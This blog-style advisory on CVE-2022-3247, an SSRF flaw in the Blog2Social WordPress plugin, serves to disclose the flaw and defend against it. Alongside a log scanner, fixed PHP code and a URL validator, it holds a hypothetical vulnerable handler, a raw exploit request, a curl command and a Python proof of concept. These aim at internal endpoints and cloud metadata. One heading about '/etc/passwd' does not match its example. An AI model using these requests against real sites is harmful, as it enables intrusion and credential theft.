If you use WordPress for blogging and social media automation, you might have heard of the Blog2Social plugin. It helps schedule and auto-post content to different social networks, making content management much easier.

However, a serious vulnerability, tracked as CVE-2022-3247, was discovered in Blog2Social plugin versions before 6.9.10. This flaw allows any logged-in user, even a low-level subscriber, to perform Server-Side Request Forgery (SSRF) attacks through improper AJAX endpoint authorization and lack of URL validation.

In this post, we’ll explain what went wrong in the code, how you could exploit it, and how to protect yourself.

## What is the Blog2Social Plugin?

Blog2Social is a popular WordPress plugin (50,000+ active installations) that automates post scheduling and sharing across Facebook, Twitter, Instagram, and other social platforms.

## What Went Wrong?

In Blog2Social versions before 6.9.10, an AJAX action that fetches URLs is registered without any authorization check. Two big problems here:

1. No capability check: *Any authenticated user can trigger the action, not just admins or editors.*
2. No external URL check: *The AJAX action will make HTTP requests to any URL (even internal, like localhost), opening doors for SSRF.*

## SSRF (Server-Side Request Forgery)

SSRF lets an attacker make HTTP requests from the server itself, potentially reaching internal resources behind the firewall that are not publicly exposed (local admin panels, other hosts on the internal network, cloud metadata services).

Let's look at how a typical vulnerable AJAX handler might look in a WordPress plugin:

```php
add_action('wp_ajax_b2s_custom_request', 'b2s_custom_request_callback');

function b2s_custom_request_callback() {
    // No capability check here: any logged-in user reaches this point
    $url = $_POST['url'];
    $response = wp_remote_get($url); // No URL validation!
    echo wp_remote_retrieve_body($response);
    wp_die();
}
```

- No current_user_can() or other capability check – any logged-in user can trigger it.
- No URL whitelist/validation – the server fetches whatever URL it is given.

## Exploit Steps

1. Log in to the WordPress site as any user (subscriber/author/contributor...).
2. Send a POST request to the AJAX endpoint with the target URL in the body:

```http
POST /wp-admin/admin-ajax.php?action=b2s_custom_request HTTP/1.1
Content-Type: application/x-www-form-urlencoded

url=http://localhost/secret-admin-endpoint
```

3. The server makes a request to http://localhost/secret-admin-endpoint and returns the response to the attacker.
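From the defender's side, the requests in the steps above show up in the web server access log: every call is a POST to admin-ajax.php with the action name in the query string, while the `url` parameter travels in the request body and is not logged. The following is an added Python example (not from the original post and not the plugin's code) that scans constructed Apache combined-format log lines for watched action names, groups the hits per client, and marks calls with no Referer from the site's own wp-admin or with a non-browser User-Agent as scripted. The action name `b2s_custom_request` is the illustrative one used in this post, the log lines, addresses and the `blog.example` site name are constructed, and in practice the watchlist should hold the plugin's real AJAX action names.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache "combined" access log lines; hosts and addresses are
# documentation ranges, not a real site. The last line is deliberately broken.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Oct/2022:17:20:01 +0000] "POST /wp-admin/admin-ajax.php?action=b2s_custom_request HTTP/1.1" 200 512 "-" "python-requests/2.28.1"
203.0.113.7 - - [25/Oct/2022:17:20:02 +0000] "POST /wp-admin/admin-ajax.php?action=b2s_custom_request HTTP/1.1" 200 1834 "-" "python-requests/2.28.1"
198.51.100.4 - - [25/Oct/2022:17:21:10 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 87 "https://blog.example/wp-admin/" "Mozilla/5.0"
203.0.113.7 - - [25/Oct/2022:17:20:03 +0000] "POST /wp-admin/admin-ajax.php?action=b2s_custom_request HTTP/1.1" 200 90 "-" "python-requests/2.28.1"
198.51.100.4 - - [25/Oct/2022:17:22:00 +0000] "POST /wp-admin/admin-ajax.php?action=b2s_custom_request HTTP/1.1" 200 640 "https://blog.example/wp-admin/admin.php?page=blog2social" "Mozilla/5.0"
malformed line that the parser must skip
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# AJAX actions worth watching. The name is the illustrative one from this
# post; replace it with the plugin's real action names from the advisory.
WATCHED_ACTIONS = {"b2s_custom_request"}


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def looks_scripted(rec, site_host):
    """Heuristic: the plugin's own front-end calls admin-ajax.php from a
    wp-admin page in a browser, so a missing or foreign Referer or a
    non-browser User-Agent is a strong signal of direct, scripted abuse."""
    ref_host = urlsplit(rec["referer"]).hostname if rec["referer"] != "-" else None
    return ref_host != site_host or not rec["ua"].startswith("Mozilla/")


def find_ajax_hits(log_text, site_host="blog.example", watched=WATCHED_ACTIONS):
    """Collect POSTs to admin-ajax.php whose action is on the watchlist.
    site_host is the assumed hostname of the WordPress site being protected."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        parts = urlsplit(rec["path"])
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        action = parse_qs(parts.query).get("action", [""])[0]
        if action in watched:
            hits.append({**rec, "action": action,
                         "scripted": looks_scripted(rec, site_host)})
    return hits


def summarize(hits):
    """Per-client count of watched-action calls and of those that look scripted."""
    out = {}
    for h in hits:
        entry = out.setdefault(h["ip"], {"count": 0, "scripted": 0})
        entry["count"] += 1
        entry["scripted"] += int(h["scripted"])
    return out


if __name__ == "__main__":
    for ip, stats in summarize(find_ajax_hits(SAMPLE_LOG)).items():
        print(ip, stats)
```

Because the access log never contains the `url` parameter, this only tells you who is hammering the action and whether the calls look automated; pairing it with a WAF or ModSecurity audit log that records request bodies is what lets you see which internal addresses were requested.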

#### Example: Retrieve Server’s /etc/passwd

Suppose the server is running on UNIX and has a local admin panel running at http://localhost:81/admin. You could try:

```shell
curl -b "wordpress_logged_in_xxx=..." -X POST \
  "https://targetsite.com/wp-admin/admin-ajax.php?action=b2s_custom_request" \
  --data "url=http://localhost:81/admin"
```

NOTE: You could also target cloud metadata endpoints like http://169.254.169.254/latest/meta-data/ if the server is on AWS.

Here's a simple Python PoC demonstrating the attack (requires `requests`):

```python
import requests

# Fill these values
wordpress_cookie = 'wordpress_logged_in_xxx=...'  # session cookie of any logged-in user
target = 'https://targetsite.com/wp-admin/admin-ajax.php'
dangerous_url = 'http://localhost:81/admin'       # internal target, as in the curl example above

data = {
    'action': 'b2s_custom_request',
    'url': dangerous_url
}

headers = {
    'Cookie': wordpress_cookie
}

# The server fetches dangerous_url itself and echoes the response body back
r = requests.post(target, data=data, headers=headers)
print(r.text)
```

## Real-World Impact

- Data Breach: Access private/internal endpoints
- Cloud Metadata Theft: Steal AWS/GCP credentials via special URLs

## Official References

- WPScan Advisory
- NIST NVD CVE-2022-3247
- Plugin website


## Mitigation / How to Protect Yourself

1. Update Blog2Social to at least v6.9.10, the first fixed release (download the latest version from the plugin page).

#### Fixed Code Example

```php
add_action('wp_ajax_b2s_custom_request', 'b2s_custom_request_callback');

function b2s_custom_request_callback() {
    // Only allow admins
    if (!current_user_can('manage_options')) {
        wp_die('Unauthorized', 403);
    }
    $url = isset($_POST['url']) ? esc_url_raw(wp_unslash($_POST['url'])) : '';
    // wp_http_validate_url() rejects non-http(s) schemes, unusual ports and
    // hosts that resolve to loopback, link-local (cloud metadata) or private
    // ranges; the SERVER_NAME comparison also refuses requests back to this site.
    if ($url === '' || !wp_http_validate_url($url)
        || parse_url($url, PHP_URL_HOST) === $_SERVER['SERVER_NAME']) {
        wp_die('Invalid URL', 400);
    }
    // wp_safe_remote_get() applies the same validation to redirects as well
    $response = wp_safe_remote_get($url);
    if (is_wp_error($response)) {
        wp_die('Request failed', 502);
    }
    echo wp_remote_retrieve_body($response);
    wp_die();
}
```
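To make explicit what a URL check in front of a server-side fetch has to cover, beyond comparing the host against the site's own name, here is an added Python example (not the plugin's code and not WordPress core's implementation) of the validation a fetch should perform before and during the request: an http(s) scheme and port allow-list, no credentials in the URL, resolving the hostname and rejecting any non-public address it maps to, and re-validating every redirect hop. DNS and HTTP are replaced by constructed tables so the block runs offline; `example.com`, `internal.attacker.example`, `blog.example` and the addresses in those tables are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

# Ports a server-side fetch may reach; a narrow allow-list is the same
# approach wp_http_validate_url() takes in WordPress core.
ALLOWED_PORTS = {80, 443, 8080}
REDIRECT_CODES = {301, 302, 303, 307, 308}


def is_public_ip(ip: str) -> bool:
    """True only for globally routable unicast addresses.

    is_global is False for loopback (127/8, ::1), link-local (169.254/16,
    where cloud metadata services live), RFC 1918 ranges, the unspecified
    address and reserved space."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def validate_outbound_url(url, resolver=socket.gethostbyname_ex, own_host=None):
    """Return (ok, reason) for a URL the server is asked to fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    if own_host and host.lower() == own_host.lower():
        return False, "request back to this site"
    # Resolve the name ourselves and check every address it maps to, so a
    # public-looking hostname that points at an internal IP is caught too.
    try:
        ipaddress.ip_address(host)
        addrs = [host]
    except ValueError:
        try:
            _, _, addrs = resolver(host)  # gethostbyname_ex: (name, aliases, ipv4 list)
        except OSError:
            return False, "host does not resolve"
    for ip in addrs:
        if not is_public_ip(ip):
            return False, f"non-public address {ip}"
    return True, "ok"


def safe_fetch(url, fetch, resolver=socket.gethostbyname_ex, max_redirects=3):
    """Fetch with redirects followed by hand so that every hop is validated.

    fetch(url) must return (status, headers, body) WITHOUT following
    redirects itself; a redirect from a harmless public URL to an internal
    address is the classic way around a check that only sees the first URL."""
    for _ in range(max_redirects + 1):
        ok, reason = validate_outbound_url(url, resolver)
        if not ok:
            return False, f"blocked {url}: {reason}"
        status, headers, body = fetch(url)
        location = headers.get("location")
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)
            continue
        return True, body
    return False, "too many redirects"


# --- constructed stand-ins for DNS and HTTP so the example runs offline ---
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    # assumed: a public name deliberately pointed at a private address
    "internal.attacker.example": ["10.0.0.5"],
}
FAKE_HTTP = {
    "https://example.com/feed": (200, {}, "feed body"),
    "https://example.com/bounce": (302, {"location": "http://169.254.169.254/latest/meta-data/"}, ""),
}


def fake_resolver(host):
    if host not in FAKE_DNS:
        raise OSError("NXDOMAIN")
    return host, [], FAKE_DNS[host]


def fake_fetch(url):
    return FAKE_HTTP[url]


if __name__ == "__main__":
    for u in ("https://example.com/feed", "http://localhost:81/admin",
              "http://169.254.169.254/latest/meta-data/",
              "http://internal.attacker.example/", "file:///etc/passwd"):
        print(u, validate_outbound_url(u, fake_resolver))
    print(safe_fetch("https://example.com/bounce", fake_fetch, fake_resolver))
```

One caveat the code cannot solve on its own: the check resolves the name and the HTTP client later resolves it again, so a DNS record that changes between the two lookups (DNS rebinding) can still slip through. The robust form connects to the very IP address that passed the check, or runs the fetch through an egress proxy that enforces the same rules at connection time.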

## Conclusion

CVE-2022-3247 is a classic example of why plugin code needs strong authorization and input validation. Even “low-privilege” AJAX actions can be abused in creative and dangerous ways.

If you’re using Blog2Social, update immediately. SSRF vulnerabilities are commonly targeted and can lead to serious breaches.

*Spread the word – and always check those plugin changelogs!*



## Further Reading

- What is SSRF? (OWASP)
- WordPress AJAX Security Best Practices

## Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/27/2022 17:02:00 UTC